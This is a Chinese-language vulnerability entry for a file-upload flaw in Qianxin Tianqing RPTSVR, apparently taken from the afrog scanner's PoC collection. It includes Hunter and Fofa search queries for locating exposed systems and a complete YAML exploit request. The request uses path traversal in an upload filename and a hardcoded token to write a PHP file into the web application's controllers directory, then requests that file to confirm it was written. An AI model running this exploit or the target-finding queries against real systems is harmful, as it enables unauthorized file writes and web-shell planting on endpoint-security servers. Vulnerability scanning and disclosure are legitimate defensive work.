qianxin-tianqing-rptsvr-fileupload: 奇安信天擎 RPTSVR 文件上传漏洞

日期: 2025-09-01 | 影响软件: 奇安信天擎RPTSVR | POC: 已公开

漏洞描述

Hunter: web.title=="360新天擎" || web.title=="360天擎终端安全管理系统" Fofa: "奇安信天擎"

PoC代码[已公开]

id: qianxin-tianqing-rptsvr-fileupload

info:
  name: 奇安信天擎 RPTSVR 文件上传漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |-
    Hunter: web.title=="360新天擎" || web.title=="360天擎终端安全管理系统"
    Fofa: "奇安信天擎"
  reference:
    - https://mp.weixin.qq.com/s/CkvAaxQThv_33e_CG9Md5w
  tags: qianxin,tianqing,fileupload
  created: 2024/02/29

set:
  randstr: randomLowercase(20)
  randbody: randomLowercase(32)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /rptsvr/upload
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"uploadfile\";filename=\"../../../application/api/controllers/{{randstr}}.php\"\r\n\
        Content-Type: text/x-python\r\n\
        \r\n\
        {{randbody}}\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"token\"\r\n\
        \r\n\
        skylar_report\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /application/api/controllers/{{randstr}}.php
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/qianxin-tianqing-rptsvr-fileupload.yaml